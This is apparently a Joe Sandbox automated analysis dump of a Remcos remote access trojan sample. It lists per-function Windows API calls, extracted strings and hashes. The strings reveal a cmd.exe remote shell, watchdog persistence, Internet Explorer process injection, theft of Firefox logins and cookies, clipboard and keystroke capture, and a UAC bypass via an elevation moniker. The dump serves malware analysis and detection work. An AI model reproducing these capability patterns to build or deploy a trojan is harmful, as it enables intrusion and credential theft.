                                              • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 004056E6
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • __Init_thread_footer.LIBCMT ref: 00405723
                                              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                              • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                              • CloseHandle.KERNEL32 ref: 00405A23
                                              • CloseHandle.KERNEL32 ref: 00405A2B
                                              • CloseHandle.KERNEL32 ref: 00405A3D
                                              • CloseHandle.KERNEL32 ref: 00405A45
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                              • API String ID: 2994406822-18413064
                                              • Opcode ID: b3bbc8d737d3af4eb4071cdf5bd626515db55c2f233fbcd9ae6de138180310ec
                                              • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                              • Opcode Fuzzy Hash: b3bbc8d737d3af4eb4071cdf5bd626515db55c2f233fbcd9ae6de138180310ec
                                              • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                              • CloseHandle.KERNEL32(00000000), ref: 00412190
                                              • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                              • String ID: 8)[$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                              • API String ID: 3018269243-3188079652
                                              • Opcode ID: 0bc6abb93a007a62e155aad46a945be6e257eeb2644a433d62495adb5594a49a
                                              • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                              • Opcode Fuzzy Hash: 0bc6abb93a007a62e155aad46a945be6e257eeb2644a433d62495adb5594a49a
                                              • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,0C[), ref: 0040F4C9
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,0C[), ref: 0040F4F4
                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0C[), ref: 0040F59E
                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                              • CloseHandle.KERNEL32(00000000,?,0C[), ref: 0040F6A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                              • String ID: 0C[$8)[$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$xdF$xdF
                                              • API String ID: 3756808967-3218781135
                                              • Opcode ID: c575ac8939463ca684cedb7c6906afd83d502d5e5bbe83c4c666d8f6a0325efa
                                              • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                              • Opcode Fuzzy Hash: c575ac8939463ca684cedb7c6906afd83d502d5e5bbe83c4c666d8f6a0325efa
                                              • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                              • FindClose.KERNEL32(00000000), ref: 0040BC04
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                              • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                              • API String ID: 1164774033-3681987949
                                              • Opcode ID: 6c639a8cbac5ca484f8773e9da93299d118512ec2cf8b834913427766c983489
                                              • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                              • Opcode Fuzzy Hash: 6c639a8cbac5ca484f8773e9da93299d118512ec2cf8b834913427766c983489
                                              • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                              APIs
                                              • OpenClipboard.USER32 ref: 004168FD
                                              • EmptyClipboard.USER32 ref: 0041690B
                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                              • GlobalLock.KERNEL32(00000000), ref: 00416934
                                              • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                              • CloseClipboard.USER32 ref: 00416990
                                              • OpenClipboard.USER32 ref: 00416997
                                              • GetClipboardData.USER32(0000000D), ref: 004169A7
                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                              • CloseClipboard.USER32 ref: 004169BF
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                              • String ID: !D@$xdF
                                              • API String ID: 3520204547-3540039394
                                              • Opcode ID: 42f4f6424a784916a7480506ad13e9ef758327aee133477e61e13fa0399f6aab
                                              • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                              • Opcode Fuzzy Hash: 42f4f6424a784916a7480506ad13e9ef758327aee133477e61e13fa0399f6aab
                                              • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                              • FindClose.KERNEL32(00000000), ref: 0040BE04
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                              • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                              • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                              Strings
                                              • API ID: Find$Close$File$FirstNext
                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 3527384056-432212279
                                              • Opcode ID: ac2c58898ed4881048f14169fe64a4f28670cbea93e3b81032ca527b9b506f8a
                                              • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                              • Opcode Fuzzy Hash: ac2c58898ed4881048f14169fe64a4f28670cbea93e3b81032ca527b9b506f8a
                                              • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                              APIs
                                              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                              • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                              • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                              • CloseHandle.KERNEL32(?), ref: 004134A0
                                              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                              • String ID:
                                              • API String ID: 297527592-0
                                              • Opcode ID: 7983295fa93a8ce34907280adcb851366deb912889fe0d98b6bb4a5c67fd3659
                                              • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                              • Opcode Fuzzy Hash: 7983295fa93a8ce34907280adcb851366deb912889fe0d98b6bb4a5c67fd3659
                                              • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                              Strings
                                              • API ID:
                                              • String ID: 0$1$2$3$4$5$6$7$VG
                                              • API String ID: 0-1861860590
                                              • Opcode ID: fa5d28c5653a06ee74d606b0804547a39682ca64517b0fde9ecd30e9690a319d
                                              • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                              • Opcode Fuzzy Hash: fa5d28c5653a06ee74d606b0804547a39682ca64517b0fde9ecd30e9690a319d
                                              • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C37D
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C3AD
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C41F
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C42C
                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C402
                                              • GetLastError.KERNEL32(?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C44D
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C463
                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C46A
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C473
                                              Strings
                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                              • String ID: 8)[
                                              • API String ID: 2341273852-1841724077
                                              • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                              • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                              • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                              • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                              • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                              • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                              Strings
                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                              • String ID: v%(/$JD$JD$JD
                                              • API String ID: 745075371-3850476003
                                              • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                              • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                              • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                              • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                              APIs
                                                • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                              • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                              Strings
                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                              • String ID: !D@$$aF$(aF$,aF$PowrProf.dll$SetSuspendState
                                              • API String ID: 1589313981-3345310279
                                              • Opcode ID: f211d8f8c74b43f6a7a1cfd36ff4f80e992d88f1a6359d5e6e54e6d8489d3d1a
                                              • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                              • Opcode Fuzzy Hash: f211d8f8c74b43f6a7a1cfd36ff4f80e992d88f1a6359d5e6e54e6d8489d3d1a
                                              • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                              APIs
                                              • _wcslen.LIBCMT ref: 0040755C
                                              • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                              Strings
                                              • API ID: Object_wcslen
                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                              • API String ID: 240030777-3166923314
                                              • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                              • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                              • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                              • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                              APIs
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                              • GetLastError.KERNEL32 ref: 0041A84C
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                              • String ID:
                                              • API String ID: 3587775597-0
                                              • Opcode ID: 19440a543c0d22c155e1aa9136b71f950e5576c6fd55d2569da49b982f6bb763
                                              • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                              • Opcode Fuzzy Hash: 19440a543c0d22c155e1aa9136b71f950e5576c6fd55d2569da49b982f6bb763
                                              • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                              APIs
                                              • _free.LIBCMT ref: 00449292
                                              • _free.LIBCMT ref: 004492B6
                                              • _free.LIBCMT ref: 0044943D
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                              • _free.LIBCMT ref: 00449609
                                              Strings
                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                              • String ID: v%(/
                                              • API String ID: 314583886-2435473048
                                              • Opcode ID: 8093d2f3b8c045a868d7bcc6f26560e4bd8a72bf10d174932f02c5f03ba06de8
                                              • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                              • Opcode Fuzzy Hash: 8093d2f3b8c045a868d7bcc6f26560e4bd8a72bf10d174932f02c5f03ba06de8
                                              • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              Strings
                                              • API ID: File$Find$CreateFirstNext
                                              • String ID: 0C[$8eF$PXG$PXG$NG$PG
                                              • API String ID: 341183262-4273802141
                                              • Opcode ID: 8c3aed3000d7320fdc4dd7ad3aab95109fbf953b62b004a5a2cf60f030c844a3
                                              • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                              • Opcode Fuzzy Hash: 8c3aed3000d7320fdc4dd7ad3aab95109fbf953b62b004a5a2cf60f030c844a3
                                              • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                              • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                              • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 1164774033-405221262
                                              • Opcode ID: 07425786a733f007aeb9a950477bd56cbd674cdc9204bf77bad9fc47ca870fce
                                              • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                              • Opcode Fuzzy Hash: 07425786a733f007aeb9a950477bd56cbd674cdc9204bf77bad9fc47ca870fce
                                              • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                              • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                              • GetKeyState.USER32(00000010), ref: 0040A46E
                                              • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                              • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                              • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                              • String ID:
                                              • API String ID: 1888522110-0
                                              • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                              • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                              • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                              • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$v%(/
                                              • API String ID: 4168288129-2425067422
                                              • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                              • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                              • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                              • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
